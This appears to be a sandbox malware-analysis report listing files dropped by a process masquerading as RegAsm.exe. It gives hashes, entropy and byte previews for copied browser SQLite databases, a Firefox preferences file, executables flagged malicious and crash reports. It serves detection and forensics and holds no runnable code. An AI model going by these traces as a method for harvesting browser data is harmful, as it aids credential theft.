SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAAKKFHCFIECAAAKEGCFIEHDAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAFIEBKKJJDAKFHIDBFH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBFIIEHJDB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423840
Entropy (8bit):	7.988954975057422
Encrypted:	false
SSDEEP:	12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
MD5:	237AF39F8B579AAD0205F6174BB96239
SHA1:	7AAD40783BE4F593A2883B6A66F66F5F624D4550
SHA-256:	836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
SHA-512:	DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8.........Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.\|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._.....7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

C:\ProgramData\CGHDAKKJJJKJ\CBKJJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\EHDGCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGIEGHJEGHJKFIEBFHJKKKFHCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGCBAFCFIJJJECBGIIJKECAFID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIDAAFI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHJDHJKFIECAAKFIJJKJKFHJKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDHIDHIEGIIIECAKEBFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\GHDHDBAECG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	391072
Entropy (8bit):	7.987128579531616
Encrypted:	false
SSDEEP:	6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
MD5:	C7E7CFC3ED17AEF6C67C265389593EE3
SHA1:	44AAEA45A59F194F33FF435A430FCBD9E7434AD5
SHA-256:	0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
SHA-512:	6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z.....b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.......q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

C:\ProgramData\IDAAKEHJDHJKEBFHJEGDAFHIJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDAFHCGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJJDAAECGHDGDGCGHDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JKECFCFBGDHIECAAFIIDAKKJJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEBGHCBAEGDHIDGCBAEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEGIDHJKKJDGCBGCGIJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEHDBAEGII.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	344992
Entropy (8bit):	7.9840811629834345
Encrypted:	false
SSDEEP:	6144:X5EAq+eU9BhaikesEDBVqaDf5kLslwEIF4TN4ha/qks1l9QjjmQ+Nb/Q5AQEO:J5vlBQB/EDBkaDRkyZIF4TN4o/29QjK0
MD5:	022CC85ED0F56A3F3E8AEC4AE3B80A71
SHA1:	A89B9C39C5F6FCB6E770CEA9491BF7A97F0F012D
SHA-256:	BB28BB63ED34A3B4F97A0A26BDA8A7A7C60F961010C795007EDC52576B89E4D3
SHA-512:	AC549B9CF50E631BAE01152DB4523FDAB55F426EE77177AF900B088244665E28DE03C10784FE9DB33A2478BEE0D96BD50E5A668D2A2BFDFF3E8706AA8F5D71A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`.......7....`.....................................S.... ..B...........x...(&...@......`................................................ ............... ..H............text........ ...................... ..`.rsrc...B.... ......................@..@.reloc.......@......................@..B........................H.......@... ..............................................................+>J]..y.. 9..=...5..t...S..4;g./.k.T.l..>GP.OC.B.$...!.xV...X.,.7.D.qRY..\.8..`M.c....6...`...D6by..e>.Ty...."lZD;...6....FN6T.^:...z._.'.._......r;...n8...Ua..<.D8..4.OvZ.2.j;o.9...;.a.}.y.R......\......`2.fv.J.C.*D.cu..'.^,b......F^I..e..H.N!...&..x..D...."...5....z.J..sE.......H....b&DI..9..Z...l.{,w.F....-. O....2...Ak.8.<.!@@a'...2...A....%.l..?.a<y.....6zZ.....'..7..Q....v>

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_b9999fb557f5cc0601cbff1ba5e75292196e5_794d4321_8e35d0aa-3f31-4485-b8dd-07e6a1164b34\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9389994777036983
Encrypted:	false
SSDEEP:	96:ZqFHN5b8hbB3HPQqUUyx9OxQXIDcQvc6QcEVcw3cE/H+BHUHZopAnQHdE7HeS9+Z:gH5b8tB3w70BU/qa6DkzuiF3Z24IO8j
MD5:	86EFB88338663730269FBB28139C3327
SHA1:	9F99FE64DD4B988909998FAECF81FC9498DE1898
SHA-256:	18C8A6727E7ADF8A78CB34419FB8EAC89CBA692B3F2418BA1461C0FAF9A853F2
SHA-512:	0978FA6C1AF0F1293220D207E506673407AC58A379A91DD2B975D9AEA4B6A32B80F2A7EE79489E55AB40FA4471F57ADA485EC04FAD3391BAF3AE6C325ABA76D5
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.2.8.4.7.9.3.2.8.3.1.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.2.8.4.8.0.0.4.7.0.4.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.3.5.d.0.a.a.-.3.f.3.1.-.4.4.8.5.-.b.8.d.d.-.0.7.e.6.a.1.1.6.4.b.3.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.9.2.8.a.c.d.-.7.9.8.9.-.4.c.e.1.-.8.a.4.9.-.6.a.4.e.c.4.4.e.2.8.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.8.-.0.0.0.1.-.0.0.1.4.-.b.9.b.7.-.9.0.7.7.9.e.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.1.7.2.0.b.6.8.9.2.e.f.3.8.2.5.e.3.9.f.7.1.7.8.5.8.4.f.f.f.8.5.8.e.c.3.f.7.3.e.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_b9999fb557f5cc0601cbff1ba5e75292196e5_794d4321_a44c566e-e322-4921-b6ee-225f544fb13e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9387916479201364
Encrypted:	false
SSDEEP:	96:YlWMFwslcebBY7tHPQqUUyx9OxQXIDcQvc6QcEVcw3cE/H+BHUHZopAnQHdE7Hen:47HBY7tw70BU/qa6DkzuiF3Z24IO8j
MD5:	662ED557DF3F589FCFDE68D4BC41735E
SHA1:	6C33D1CD76A6A7882696A5B61340B294100F29A4
SHA-256:	81B8569AC6FB4E9240EE98465CEDECF1DDE40857C5BB98DCE6B6FE5E7533D9F3
SHA-512:	9341E8B19EB2ED52D307D2E310F412850E53BCB93ADAFE80CA2468122D6E26EF74F03400EEC1C12C044DB9C542C99CFB75D4C855A2376A4188A181AA82034242
Malicious:	false
